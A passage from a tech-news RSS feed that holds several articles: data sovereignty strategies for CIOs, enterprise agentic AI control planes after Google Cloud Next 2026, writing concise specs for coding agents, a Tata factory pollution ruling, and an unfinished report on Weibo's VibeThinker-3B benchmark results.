<p>The shift is also reshaping operating models. According to Bell, workload placement strategies are increasingly driven by sensitivity of data, regulatory exposure, and operational risk. “We’re moving from a cloud-first mindset to more of a fit-for-purpose approach,” she says.</p>



<h2 class="wp-block-heading">2. Design for multi-jurisdiction resilience, not efficiency</h2>



<p>As geography becomes a constraint, resilience is replacing efficiency as the primary design goal. Enterprises are rethinking their dependence on a small number of global providers, particularly hyperscalers. While companies such as AWS, Microsoft, and Google remain central to most IT strategies, CIOs are increasingly wary of <a href="https://www.cio.com/article/4146639/ai-is-coming-for-your-office-productivity-suite-too.html?utm=hybrid_search">concentration risk</a>.</p>



<p>“Vendor concentration is now treated as systemic risk, not strategic leverage,” Pinto says. Rather than abandoning hyperscalers, organizations are intentionally fragmenting their portfolios. Global providers are retained for standardized, low-risk workloads, while regional or sovereign alternatives are introduced for more sensitive applications.</p>



<p>According to Jaser, many organizations are now discovering how deeply earlier cloud consolidation decisions constrained their flexibility. “A lot of companies optimized everything for a single cloud provider in terms of technology, skills, and planning,” he says. “Then they realized they had three- or five-year contracts with commitments, which limits the ability to choose something else.”</p>



<p>Babin points to emerging risks that go beyond compliance. In some regions, even data centers are becoming potential targets in geopolitical conflicts. “CIOs now have to think about where their AI models are running and what risks exist in those locations,” he says.</p>



<p>The result is a more resilient, albeit splintered, sourcing model — one designed to preserve optionality if geopolitical, regulatory, or vendor conditions change.</p>



<h2 class="wp-block-heading">3. Classify workloads by sovereignty and risk profile</h2>



<p>If resilience requires diversification, it also requires precision. Not every workload needs the same level of protection. That’s where a more granular approach to sovereignty is emerging. Rather than treating it as a binary choice — sovereign or not — CIOs are increasingly thinking in terms of a spectrum.</p>



<p>“It’s not a black-and-white conversation,” Jaser says. “It depends on the workload, its relevance, and the specific sovereignty requirements attached to it.”</p>



<p>In practice, that means classifying workloads based on risk, sensitivity, and business impact. Highly sensitive data such as HR, security, or proprietary AI models may need to remain in tightly controlled environments, whether in sovereign clouds or on-prem infrastructure. Less sensitive applications like marketing systems or public-facing services can continue to run in global cloud environments.</p>



<p>This workload-based approach allows CIOs to balance competing priorities of cost, performance, regulatory compliance, and <a href="https://www.cio.com/article/4135922/what-ax-can-do-to-deliver-cohesion-and-uniformity-to-ai-agents.html?utm=hybrid_search">UX</a>. It also reflects a more mature understanding of sovereignty as a set of trade-offs rather than an absolute goal.</p>



<p>Jaser also argues that CIOs should avoid overcomplicating the process. “Don’t over-engineer it,” he says. “Just start classifying your workloads and move to relevant things.”</p>



<p>Bell argues that most enterprise data don’t require the same level of protection. “More than 90% of enterprise data can safely sit in the public domain,” she says. “There’s really a small percentage that represents the keys to the castle and needs to be protected.”</p>



<h2 class="wp-block-heading">4. Build portability and exit into every layer of the stack</h2>



<p>As organizations distribute workloads across multiple clouds, sovereign environments, and regional providers, the ability to move workloads becomes critical.</p>



<p>Designing for workload portability upfront is becoming increasingly important, Bell says, and that flexibility becomes a critical requirement, not just for optimization.”</p>



<p>Technically, this is driving greater adoption of open standards, containerization, and orchestration platforms such as Kubernetes. These technologies make it easier to shift workloads between environments, whether across cloud providers or between <a href="https://www.cio.com/article/4159281/neglecting-the-cloud-good-luck-with-ai.html?utm=hybrid_search">cloud</a> and on-prem systems.</p>



<p>Contractually, CIOs are pushing for stronger exit clauses, price protections, and flexibility. According to Pinto, organizations are increasingly embedding exit by design into their sourcing strategies since if contracts don’t allow for rapid disengagement, they may find themselves locked into environments that no longer meet regulatory or operational requirements.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Shannon Bell, OpenText</p>
</figcaption></figure><p class="imageCredit">OpenText</p></div>



<p>The goal isn’t constant movement, but optionality. CIOs want the ability to adapt as conditions change. “The mistake some CIOs make is trying to have an extreme amount of portability, or not enough portability,” Bell says. “The magic is in the middle.”</p>



<h2 class="wp-block-heading">5. Extend sovereignty thinking to the edge and endpoints</h2>



<p>While much of the sovereignty discussion focuses on cloud infrastructure, risk doesn’t stop at the data center but extends to how data is accessed, particularly in a world of remote work and mobile devices. That’s where a less visible but increasingly important dimension of the problem is emerging.</p>



<p>“The business transcends borders, but your data can’t always do the same,” Stern says.</p>



<p>As employees travel and work remotely, sensitive data may be accessed across jurisdictions in ways that violate local regulations. Devices can also be inspected or seized at borders, creating additional exposure. As a result, some organizations are rethinking the model entirely, focusing less on securing devices and more on controlling access to data.</p>



<p>Stern argues that AI and distributed workforces are changing the nature of enterprise security itself. “Identity is now becoming the perimeter,” he says. “It’s not device-centric anymore but identity-centric.”</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Matt Stern, Hypori</p>
</figcaption></figure><p class="imageCredit">Hypori</p></div>



<p>This shift reflects a broader reality that sovereignty is more about who can access data, from where, and under what conditions rather than just about where it’s stored.</p>



<h2 class="wp-block-heading">From cost optimization to continuous risk management</h2>



<p>Taken together, these changes point to a broader transformation in the <a href="https://www.cio.com/article/4126383/how-the-growing-ai-workforce-is-changing-the-cio-role.html?utm=hybrid_search">CIO role</a>. Technology strategy is about managing a dynamic set of risks for the long term that spans regulation, geopolitics, supply chains, and security, not just delivering capability at the lowest cost.</p>



<p>“This isn’t solely the responsibility of the CIO,” says Babin. “The executive team and the board need to understand the trade-offs.” In many cases, achieving greater control and adaptability requires additional costs, slower deployment, or reduced access to cutting-edge features.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Ron Babin, Toronto Metropolitan University</p>
</figcaption></figure><p class="imageCredit">Toronto Metropolitan University</p></div>



<p>As organizations adapt, CIOs are building strategies that are more complex but also more resilient. According to Pinto, the organizations best positioned for this shift will be those that treat geopolitics as a permanent design constraint not a source of temporary disruption.</p>



<p>That requires a different mindset around operational readiness and risk management. “Being risk ready is about understanding, mitigating, and managing risk in real time,” says Bell.</p>



<p>For CIOs, sovereignty is no longer a niche compliance issue. It’s becoming a core design principle shaping how technology is sourced, deployed, governed, and secured.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Who owns the control plane? Google Cloud Next 2026 and the real contest in agentic AI]]></title>
<description><![CDATA[I recently spent some time reflecting on the announcements from Google Cloud Next 2026, as well as a series of vendor briefings and a handful of enterprise architecture engagements, where the same question kept coming up across different venues: once an organization has agents, who governs them? ...]]></description>
<link>https://tsecurity.de/de/3604149/it-security-nachrichten/who-owns-the-control-plane-google-cloud-next-2026-and-the-real-contest-in-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604149/it-security-nachrichten/who-owns-the-control-plane-google-cloud-next-2026-and-the-real-contest-in-agentic-ai/</guid>
<pubDate>Wed, 17 Jun 2026 11:09:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I recently spent some time reflecting on the announcements from Google Cloud Next 2026, as well as a series of vendor briefings and a handful of enterprise architecture engagements, where the same question kept coming up across different venues: once an organization has agents, who governs them? For two years, the enterprise AI conversation has been a conversation about models — whose is largest, whose is cheapest, whose context window stretches furthest.  Virtually no one was talking about data and semantic context.</p>



<p>After getting some perspective, I was forced to consider that model obsession might have finally fizzled out under the grim reality of non-existent ontologies and limited to no semantic context for enterprise data. The interesting question is no longer which model an enterprise runs. It is who controls the connective context layer — the agentic control plane — that decides what those agents know, what they are allowed to do and who is accountable when a thousand of them are running at once. Whoever owns that layer owns the next decade of enterprise AI and judging by the “marketecture” of every major vendor at Next 2026, the industry has reached the same conclusion.</p>



<p>The urgency here is clearly not a slide-ware exercise. Gartner has <a href="https://www.gartner.com/en/newsroom/press-releases/2025-08-26-gartner-predicts-40-percent-of-enterprise-apps-will-feature-task-specific-ai-agents-by-2026-up-from-less-than-5-percent-in-2025" rel="nofollow">reported</a> an exponential surge in enterprise inquiries about multi-agent systems and predicts that 40% of enterprise applications will embed task-specific agents by the end of 2026, up from less than 5% a year earlier. Yet the same analysts deliver an equally important counterweight: Gartner also <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027" rel="nofollow">expects</a> more than 40% of agentic AI projects to be canceled by the end of 2027, citing escalating cost, an expanded risk surface and governance that no one built in advance. The <a href="https://www.gartner.com/en/articles/hype-cycle-for-agentic-ai" rel="nofollow">2026 Gartner Hype Cycle for Agentic AI</a> makes the diagnosis plain — governance, security and FinOps capabilities are proliferating precisely because enterprises are alarmed about accountability and control as agents grow more autonomous and interconnected. Exponential demand colliding with non-existent guardrails is the environment Google walked into. So, what is the path forward to a control plane an enterprise can actually trust?</p>



<h2 class="wp-block-heading">What Google actually brought to Next 2026</h2>



<p>I’m not ardent supporter of single-ecosystem architectures.  That’s not the world we live in and interoperability has always prevailed as the final arbiter of truth.  Beneath all the agent drama, however, Google’s message was fundamentally architectural. The company repositioned Gemini less as a standalone model and more as the connective and contextual tissue binding data systems, applications and agent runtimes, and assembled Big Query, Alloy DB, Spanner and its managed Spark service into a new category it calls the Agentic Data Cloud. As <a href="https://www.constellationr.com/insights/news/google-cloud-next-2026-look-big-themes" rel="nofollow">Constellation Research</a> observed, the standardization of data on Apache Iceberg has put the data layer itself in play, and Google responded by stacking its assets into a cross-cloud lakehouse and a knowledge catalog, complete with migration tooling pointed squarely at Snowflake and Databricks.</p>



<p>Three pillars define the offering. The first is a federated data layer built on the principle of reach, not relocation. By integrating Cross-Cloud Interconnect directly into the data plane and pairing it with the Apache Iceberg REST Catalog, Google lets agents query data residing on AWS or Azure as though it were local, with no egress fees and extends bi-directional federation in preview to Databricks’ Unity Catalog, Snowflake’s Polaris and the AWS Glue Data Catalog, <a href="https://cloud.google.com/blog/products/data-analytics/whats-new-in-the-agentic-data-cloud" rel="nofollow">according to Google’s own technical briefings</a> and <a href="https://venturebeat.com/data/the-modern-data-stack-was-built-for-humans-asking-questions-google-just-rebuilt-its-for-agents-taking-action" rel="nofollow">independent analysis</a>. Google data cloud managing director Yasmeen Ahmad summarized in Google’s <a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next26" rel="nofollow">Next ’26 announcement</a> with characteristic economy: you don’t move the data, you connect it.</p>



<p>The second pillar is a semantic layer — the Knowledge Catalog, an evolution of Dataplex — which uses Gemini to tag assets, infer relationships and map business meaning so that agents are grounded rather than, as one <a href="https://egen.ai/insights/three-biggest-ai-announcements-from-google-cloud-next-2026/" rel="nofollow">analysis</a> put it, fast but blind. Critically, its retrieval is permission-aware, meaning agents can only retrieve and act on assets they are explicitly authorized to see — a design choice that fuses context delivery and access control into a single operation. The third pillar is a build layer, the Data Agent Kit, which ships as portable skills, MCP tools and IDE extensions that drop into VS Code, Claude Code, Gemini CLI and Codex, deliberately declining to impose a new proprietary interface.</p>



<p>This is a credible and, to Google’s credit, a mostly real offering.  A control plane, however, is a claim, not a feature, and the term deserves more focus and detail than vendors typically provide.   An agentic control plane is not a product it is a semantically governed set of domain services and underlying structured and unstructured data.   How we federate agentic access and data with intention and governance means everything.</p>



<h2 class="wp-block-heading">What an interoperable control plane requires</h2>



<p>A control plane governs how a system behaves rather than performing the work itself. For agents, a genuine control plane must deliver at least five functions, and an interoperable one must deliver them across vendor, model and cloud boundaries rather than only within a single domain or scope.</p>



<p>The first is identity. Agents are a new class of non-human actors, and an enterprise must be able to authenticate them and manage their actions. Microsoft’s competing Agent 365, unveiled at Ignite 2025, is built explicitly around a registry of which agents exist, plus access control and security — as an Ignite 2025 <a href="https://news.microsoft.com/ignite-2025-book-of-news/" rel="nofollow">industry analysis</a> noted, that identity is foundational. The second is context and semantics, the half of the problem the data clouds have collectively rushed toward. The third, and the most consistently underplayed, is action governance — control not merely over what an agent can read, but over what it can do: the writes, the state changes, the transactional operations. The fourth is observability and lifecycle management, the simulate-evaluate-monitor-optimize loop across an agent fleet, where Google’s integrated offering is, by most accounts, the most complete a hyperscaler has yet shipped. The fifth is economics; the reason so many projects are forecast to fail is partly cost, and FinOps for agentic AI is now an expressly named discipline on Gartner’s Hype Cycle.</p>



<p>Interoperability cuts across all five, and here the industry has done something genuinely impactful and useful: it has agreed on protocols. The Model Context Protocol, originated by Anthropic and since donated to the Linux Foundation under multi-vendor governance, standardizes how an agent connects to tools and data. The Agent2Agent protocol, originated by Google and likewise moved to the Linux Foundation, governs how agents discover and delegate to one another across organizational boundaries. <a href="https://www.atchai.com/blog/model-context-protocol-enterprise-guide-2026" rel="nofollow">Forrester predicts</a> that 30% of enterprise app vendors will launch their own MCP servers in 2026, and <a href="https://www.gartner.com/en/newsroom/press-releases/2025-08-26-gartner-predicts-40-percent-of-enterprise-apps-will-feature-task-specific-ai-agents-by-2026-up-from-less-than-5-percent-in-2025" rel="nofollow">Gartner’s Anushree Verma</a> positions standardized protocols as the enabler of the seamless interoperability that, by 2028, will let networks of specialized agents collaborate dynamically across applications.</p>



<p>What is key here — and what enterprise leaders miss — is that open protocols deliver portable messages, not a portable control plane. Two agents can exchange tasks across clouds in A2A all day long, but identity, semantics, action governance, observability and cost remain platform functions.  A2A and MCP have ensured that the communication protocol has been commoditized.  The final frontier and the competitive moat is not the communication and access protocol, it is the semantic context and the business ontology</p>



<h2 class="wp-block-heading">Where Google is strong, and where leaders should look twice</h2>



<p>Google deserves real credit for embracing open standards where it counts. It adopted MCP across its own services, repositioned Apigee as an MCP bridge that turns any standard API into a governed agent tool and built its federation story on the open Iceberg REST Catalog rather than a proprietary format. <a href="https://tbri.com/special-reports/next-2026-lakehouse-and-agentic-paas-push-google-cloud-closer-to-the-center-of-ai-value-creation/" rel="nofollow">Technology Business Research</a> (TBR) characterized this as a meaningful strategic shift: a company historically defensive about keeping data inside BigQuery now signals that it cares less about where data physically resides than about ensuring Gemini is the semantic context layer generating value on top of it.</p>



<p>That repositioning is exactly the lock-in risk an enterprise must carefully consider, and two limitations matter significantly and deserve an architect’s attention. The first is that federation is not the same as unified control. In my view, TBR’s analysis is totally on point: The Knowledge Catalog addresses upper-stack governance but is not an operational catalog in the way that Databricks’ Unity Catalog, Snowflake’s Polaris and AWS Glue are — those systems govern the underlying Iceberg tables. Google reads into them; it does not replace them. The second is that the focus of lock-in has simply moved up the stack to the semantic context and ontology layers.  Moor Insights &amp; Strategy and others all have cautionary tales that exiting Google-managed semantics, Gemini agents or BigQuery abstractions may prove harder than migrating the data itself. The semantics and the orchestration are now the sticky layer. I think this is a logically coherent and impressive strategy, but for every gain, something is lost.  That loss is exactly the moment where an enterprise either preserves its independence or succumbs to lock-in for convenience and expedience.</p>



<p>There is a maturity gap also worth mentioning here as well. One widely-circulated <a href="https://blog.rittmananalytics.com/google-next-26-the-agent-stack-is-ready-the-semantic-engine-isn-t-44d1287e31f9" rel="nofollow">analysis</a> of Next 2026 carried its verdict in the title — the agent stack is ready, the semantic engine isn’t — arguing that the Knowledge Catalog, however promising, is not yet the governed business-context layer a true enterprise operating system demands and remains more aspirational than operational. With much of the federation and catalog functionality still in preview, optimism is the right approach from my perspective, not “all-in” commitment.</p>



<h2 class="wp-block-heading">Meanwhile, the competition is playing a different game</h2>



<p>The competitors are not building the same artifact, and the differences are instructive. The data-cloud catalogs — Databricks Unity Catalog, Snowflake Polaris and Cortex, AWS Glue, Microsoft Fabric — govern data and, increasingly, semantics; the entire field now accepts that agents need context, not merely access, as <a href="https://www.infoworld.com/article/4162737/google-pitches-agentic-data-cloud-to-help-enterprises-turn-data-into-context-for-ai-agents.html">industry analysis</a> of the field documents. Their structural limit is that catalog constraints are frequently informational rather than strictly enforced, and metric-oriented semantic layers model measures rather than actions or state changes. They excel at conversing with data and remain weaker at agents that act. The agent-management planes, exemplified by Microsoft’s Agent 365, approach the problem from fleet control — registry, identity, observability — and are excellent for organizations living inside Microsoft 365, bounded by that same dependence.</p>



<p>Palantir Foundry represents a genuinely different category. Where catalogs register tables and semantic layers define metrics, Foundry is built around an ontology that models entities, their typed relationships and the actions that can be taken against them — semantics in service of operational execution, not merely analytics.  That distinction is the single most important idea for anyone designing an agentic control plane today. As <a href="https://atlan.com/know/ontology-vs-semantic-layer/" rel="nofollow">Atlan</a> frames it, a semantic layer hands agents governed metrics, which solves half the problem; agents that reason across domains and act need a knowledge-representation layer underneath — what things are, how they relate and what operations are possible. A control plane that governs reads but not writes, metrics but not actions, is fundamentally limiting for agents, and semi-autonomous action is the entire point.    It is also worth noting, the semantic layer itself is now standardizing: the Open Semantic Interchange initiative, launched in late 2025 by Snowflake, dbt Labs, Salesforce and a coalition of partners under an Apache 2.0 license, finalized its v1.0 specification in early 2026. Just as MCP and A2A commoditized the agent communication protocols, OSI aims to commoditize semantic portability.</p>



<h2 class="wp-block-heading">A blueprint for enterprise leaders</h2>



<p>As always, the path forward is clear enough to state but extremely demanding to execute. An interoperable agentic control plane is not a product an enterprise purchases from a single vendor; it is an architecture it composes — open standards at the commoditized layers, owned assets at the differentiating one. Drawing on both the Next 2026 announcements and recent architectural engagements, I would urge leaders to prioritize four design commitments.</p>



<p><strong>First, standardize on open formats at the storage layer. </strong>Apache Iceberg and its REST Catalog deliver genuine data portability, and this is the one element of Google’s model worth adopting wholesale, precisely because the broader industry already has. Second, standardize on open protocols at the agent layer— A2A between agents and MCP to tools and systems — so that a Gemini agent, a Claude agent and a partner’s agent can interoperate without any one of them owning the others. Third, own the semantic and ontology layer in the middle. Don’t just model metrics but entities, relationships and the typed actions agents may perform; this is what delivers semantic portability and keeps the vendor lock-in at bay and in the enterprise’s own hands rather than a vendor.   Fourth, own the control-plane core components — identity, registry, observability and policy — so that governance remains independent of any single platform.</p>



<p>Any vendor relationship that requires managed semantics will make it intentionally harder to migrate data.   The architectural response should never be to place those semantics in any single vendor’s control in the first place. Federation buys data portability; an owned ontology buys semantic portability; open protocols buy agent portability. Composed together, they close the gap that the analysts identified.</p>



<p>The vendors will continue to make the case that the control plane is a product. The analysts — Gartner on governance and failure rates, Forrester on protocol proliferation, TBR and Moor on the limits of federation — are collectively telling enterprise leaders something more useful: it is an architectural decision, and the organizations that treat it as one, that build adaptive governance before their agentic minions outpace them and that preserve the option to change their minds, will be the ones still in command of their AI a decade from now.</p>



<p>Google Cloud Next 2026 is a genuinely strong architecture, and there is no doubt that it is the most complete agentic control-plane offering any hyperscaler has yet shipped. It is also the clearest illustration to date of why no enterprise should outsource its control plane to anyone. The shift from owning models to owning the control plane is not just underway; for organizations serious about operating at the speed of an agent-driven business, it is inevitable. The winning move at this point is to show up with an architecture, not a purchase order.</p>



<p><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="nofollow"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time, as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the</em><a href="https://iasaglobal.org/" target="_blank" rel="nofollow"><em> IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em> </p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Code like Hemingway]]></title>
<description><![CDATA[I was blessed with a terrific high school English teacher. Ms. Jewel was funny, kind, interesting, and tough on us. I can still spell “ecstasy” on the first try because of her. One of the more memorable lessons she taught was a “Hemingway and Fitzgerald” module. 



I loved the short stories of b...]]></description>
<link>https://tsecurity.de/de/3604137/ai-nachrichten/code-like-hemingway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604137/ai-nachrichten/code-like-hemingway/</guid>
<pubDate>Wed, 17 Jun 2026 11:04:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I was blessed with a terrific high school English teacher. Ms. Jewel was funny, kind, interesting, and tough on us. I can still spell “ecstasy” on the first try because of her. One of the more memorable lessons she taught was a “Hemingway and Fitzgerald” module. </p>



<p>I loved the short stories of both, but Hemingway’s work always stuck out for me. It’s cliché to say that Hemingway was terse, but we only say it because it is true. He could pack more into a page than most writers. He didn’t waste a syllable. </p>



<p>Software developers are soon going to have to take a lesson from Hemingway.</p>



<p>It’s not hard to be concise in code. You have to be, by design. The compiler won’t put up with any throat-clearing and jibber-jabber. You can’t meander. You have to use a very strict set of words and symbols, and you have to use them in a defined way. </p>



<p>Thanks to agentic development, <a href="https://www.infoworld.com/article/4096265/writing-code-is-so-over.html">we don’t write code anymore</a>. But we are writing for the agents. A lot. </p>



<h2 class="wp-block-heading">All about the spec</h2>



<p>Let me explain. Claude Code, Codex, Copilot, and the rest all love to be “spoken” to <a href="https://www.infoworld.com/article/4146579/markdown-is-now-a-first-class-coding-language-deal-with-it.html">in Markdown</a>. We used to define our code with unit tests and specifications written for humans. Now, it’s all about the spec. And the spec needs to be both complete and concise. </p>



<p>It needs to be complete in the sense that if you leave something out or forget to define something, the agent will very likely fill in the gaps for you. Forget a feature or requirement, and the agent will go off confidently and almost certainly in the wrong direction.</p>



<p>At the same time, you need to be concise. Because if you are too effusive, you may give the agent ideas that you don’t want it to have. If you write like Fitzgerald — lush and expansive —  the agent will be off and running in a direction you can’t be sure about. </p>



<p>Our compilers will stop cold if we aren’t precise and concise. Our agents? They will proceed with confidence, diligently producing a result that looks great but isn’t what we want.</p>



<p>So we need to learn to write like Hemingway and pack as much meaning into as few words as possible. Or, as Paul Graham said:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/paul_graham_tweet_08dac6.png" alt="paul graham tweet" class="wp-image-4185837" width="720" height="306" sizes="auto, (max-width: 720px) 100vw, 720px"></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Let’s be clear</h2>



<p>For years, we’ve been writing semi-vague Jira tickets and expecting our fellow humans to fill in the gaps and “get the gist” of what we were trying to do. We don’t have that luxury anymore. Developers who aren’t able to move on from “Jira-speak” to “Agent-speak” are going to struggle. If we don’t follow Graham’s advice in writing those specs, who knows what we’ll get.</p>



<p>Maybe someday agents will know the ins and outs of our business well enough to “know what we mean,” but they can’t today. The time we used to spend coding now needs to be spent perfecting our new craft of writing precise specifications for our agents to execute.</p>



<p>Every <a href="https://en.wikipedia.org/wiki/Listicle">listicle</a> ever written on “How to be a Great Developer” says you need to be a great communicator — but that was communication with other humans. </p>



<p>Ms. Jewel always taught us that our writing is only as clear as our thinking. Our compilers forced us to write clearly. Our coding agents won’t do that. I’m sure there are many developers out there now who wish they had listened more closely to their high school English teacher.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tata Clears Pollution Scrutiny At Its Indian iPhone Parts Plant]]></title>
<description><![CDATA[Indian manufacturer Tata Electronics has officially cleared a major regulatory hurdle at its factory in Hosur, Tamil Nadu. The state pollution control board dropped a previous investigation into the facility after the company proved it was not contaminating local water supplies. This specific man...]]></description>
<link>https://tsecurity.de/de/3604050/ios-mac-os/tata-clears-pollution-scrutiny-at-its-indian-iphone-parts-plant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604050/ios-mac-os/tata-clears-pollution-scrutiny-at-its-indian-iphone-parts-plant/</guid>
<pubDate>Wed, 17 Jun 2026 10:24:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Indian manufacturer Tata Electronics has officially cleared a major regulatory hurdle at its factory in Hosur, Tamil Nadu. The state pollution control board dropped a previous investigation into the facility after the company proved it was not contaminating local water supplies. This specific manufacturing plant plays a massive role in helping Apple build internal parts and back panels for the iPhone.



The quick resolution keeps production lines moving as the American tech giant works to expand its supply chain operations.



Independent water tests prove the factory operates safely



The Tamil Nadu Pollution Control Board originally sent a warning notice to the manufacturer after local farmers raised alarms about their groundwater. The farmers suspected that wastewater from the electronics plant was overflowing from an internal rainwater pond and leaking into the open wells on their nearby farm lands. The government board even warned the company that it could face a forced shutdown if the problem went ignored.



To settle the matter, the manufacturer ordered an independent analysis from a certified laboratory to check the surrounding water quality. The final results clearly showed that all chemical levels were perfectly normal and safe. In addition, the state pollution board ran its own tests on recently collected water samples and reached the same conclusion. The board found no signs of harmful contamination in the soil or the water.



With both independent and government tests coming back clean, the state board confirmed that the company properly answered all of its questions. The regulatory group then dropped all further action against the factory. This outcome is a huge win for the local manufacturing push, keeping thousands of workers on the job while avoiding any delays in smartphone production.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Weibo’s tiny VibeThinker-3B has the AI world arguing over benchmarks again]]></title>
<description><![CDATA[On Sunday, a team of nine researchers at Sina Weibo — the Chinese social media giant better known for its microblogging platform than for cutting-edge artificial intelligence — quietly posted a 14-page technical report to arXiv that sent shockwaves through the AI research community. Their claim: ...]]></description>
<link>https://tsecurity.de/de/3603428/it-nachrichten/why-weibos-tiny-vibethinker-3b-has-the-ai-world-arguing-over-benchmarks-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603428/it-nachrichten/why-weibos-tiny-vibethinker-3b-has-the-ai-world-arguing-over-benchmarks-again/</guid>
<pubDate>Wed, 17 Jun 2026 03:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>On Sunday, a team of nine researchers at <a href="https://weibo.com/">Sina Weibo</a> — the Chinese social media giant better known for its microblogging platform than for cutting-edge artificial intelligence — quietly posted a <a href="https://arxiv.org/pdf/2606.16140">14-page technical report</a> to arXiv that sent shockwaves through the AI research community. Their claim: a language model with just 3 billion parameters can match or exceed the reasoning performance of flagship systems from <a href="https://deepmind.google/">Google DeepMind</a>, <a href="https://openai.com/">OpenAI</a>, <a href="https://www.anthropic.com/">Anthropic</a>, and <a href="https://chat.deepseek.com/">DeepSeek</a> that are hundreds of times larger.</p><p>The model, called <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a>, scored 94.3 on <a href="https://aime26.aimedicine.info/">AIME 2026</a> — the American Invitational Mathematics Examination, one of the most demanding standardized math competitions in the world. That figure places it alongside <a href="https://api-docs.deepseek.com/news/news251201">DeepSeek V3.2</a>, a model with 671 billion parameters, and ahead of <a href="https://blog.google/products-and-platforms/products/gemini/gemini-3/">Gemini 3 Pro</a>, Google's high-performance flagship reasoning system, which scored 91.7. With a test-time scaling technique the team calls Claim-Level Reliability Assessment, the score climbs to 97.1, edging past virtually every system in the public record.</p><p>Within hours of publication, the paper had drawn 62 upvotes on <a href="https://huggingface.co/papers/2606.16140">Hugging Face's daily papers</a> feed, the model repository had accumulated 130 likes, and the <a href="https://github.com/WeiboAI/VibeThinker">GitHub repository</a> had reached 685 stars. But the reaction on social media was not uniformly celebratory. It was, in many cases, deeply skeptical.</p><p>"WHAT THE HELL is happening in AI?" wrote the user <a href="https://x.com/orcus108/status/2066876960073281582">@orcus108</a> on X, in a post that accumulated over 161,000 views. "A 3B parameter model just put up coding benchmark scores in the same league as Claude Opus 4.5… I genuinely don't know if this is a breakthrough or if the benchmarks are broken."</p><p>That tension — between genuine scientific advancement and the growing suspicion that AI benchmarks have become gameable to the point of meaninglessness — sits at the heart of the <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> story. And the answer matters enormously, not just for academic bragging rights, but for the multibillion-dollar question of whether the AI industry's relentless push toward ever-larger models is the only path to intelligence.</p><div></div><h2><b>Benchmark scores that defy the scaling laws of modern AI</b></h2><p>The results reported in the technical report are, by any conventional standard, extraordinary.</p><p>On the mathematics side, <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> achieved 91.4 on <a href="https://artificialanalysis.ai/evaluations/aime-2025">AIME 2025</a>, 94.3 on <a href="https://llm-stats.com/benchmarks/aime-2026">AIME 2026</a>, 89.3 on <a href="https://huggingface.co/datasets/MathArena/hmmt_feb_2025">HMMT 2025</a> (the Harvard-MIT Mathematics Tournament), 93.8 on <a href="https://huggingface.co/datasets/MathArena/brumo_2025">BruMO 2025</a> (the Brown University Math Olympiad), and 76.4 on <a href="https://huggingface.co/datasets/Hwilner/imo-answerbench">IMO-AnswerBench</a>, a benchmark comprising 400 problems at the level of the International Mathematical Olympiad. In coding, it posted an 80.2 Pass@1 on <a href="https://www.kaggle.com/benchmarks/open-benchmarks/livecodebench-release-v6">LiveCodeBench v6</a>, a benchmark designed to test executable code generation, and achieved a 96.1 percent acceptance rate on unseen <a href="https://leetcode.com/contest/">LeetCode weekly</a> and biweekly contests from late April through late May 2026. On instruction following, it scored 93.4 on <a href="https://huggingface.co/datasets/google/IFEval">IFEval</a>.</p><p>To put the parameter disparity in perspective: <a href="https://api-docs.deepseek.com/news/news251201">DeepSeek V3.2</a> has 671 billion parameters — roughly 224 times the size of <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a>. <a 